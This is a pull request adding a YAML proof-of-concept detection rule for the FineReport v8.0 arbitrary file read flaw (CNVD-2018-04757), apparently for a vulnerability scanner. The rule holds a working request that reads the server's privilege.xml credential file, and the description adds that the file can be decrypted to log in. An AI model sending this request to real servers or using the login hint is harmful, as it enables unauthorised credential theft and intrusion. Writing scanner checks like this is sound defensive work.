### PR TITLE
Create FineReport-v8.0-Arbitrary-file-read.yml

### DIFF
--- a/pocs/FineReport-v8.0-Arbitrary-file-read.yml
+++ b/pocs/FineReport-v8.0-Arbitrary-file-read.yml
@@ -1,4 +1,4 @@
-name: poc-yaml-FineReport-v8.0-Arbitrary-file-read
+name: poc-yaml-fineReport-v8.0-arbitrary-file-read
 rules:
   - method: GET
     path: /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml

--- a/pocs/FineReport-v8.0-Arbitrary-file-read.yml
+++ b/pocs/FineReport-v8.0-Arbitrary-file-read.yml
@@ -1,0 +1,11 @@
+name: poc-yaml-FineReport-v8.0-Arbitrary-file-read
+rules:
+  - method: GET
+    path: /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b"rootManagerName") && response.body.bcontains(b"CDATA")
+detail:
+  author: Facker007(https://github.com/Facker007)
+  links:
+    - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%20v8.0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CNVD-2018-04757.html?h=%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757
## 测试环境
body="isSupportForgetPwd"
只能检测v8.0
## 备注
poc的检测规则是基于网上寻找得来。如果不存在这个页面，或者页面没有内容都是不存在内容。如果存在内容且与语法匹配就存在。可利用，解密即可登录。